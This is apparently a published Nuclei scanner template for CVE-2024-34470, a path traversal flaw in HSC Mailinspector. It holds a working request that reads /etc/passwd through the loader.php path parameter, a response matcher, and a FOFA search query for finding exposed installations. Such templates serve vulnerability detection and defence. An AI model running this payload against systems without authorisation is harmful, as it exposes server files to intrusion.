An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
PoC代码[已公开]
id: CVE-2024-34470
info:
name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
author: topscoder
severity: high
description: |
An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
reference:
- https://github.com/osvaldotenorio/CVE-2024-34470
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/fkie-cad/nvd-json-data-feeds
- https://nvd.nist.gov/vuln/detail/CVE-2024-34470
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
epss-score: 0.93407
epss-percentile: 0.99814
metadata:
verified: true
max-request: 2
fofa-query: "mailinspector/public"
tags: cve,cve2024,lfi,mailinspector,hsc
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/mailinspector/login.php"
host-redirects: true
matchers:
- type: word
part: body
words:
- "Licensed to HSC TREINAMENTO"
- method: GET
path:
- "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a0047304502201dbd6eb2a6b1784e934f6bd4cce99e077a2f94e4df0e6911978be60df5902d8e0221009277393b2613661aa02d6ee43f83ea370e9db45e105f999948df092661a70c6b:922c64590222798bb761d5b6d8e72950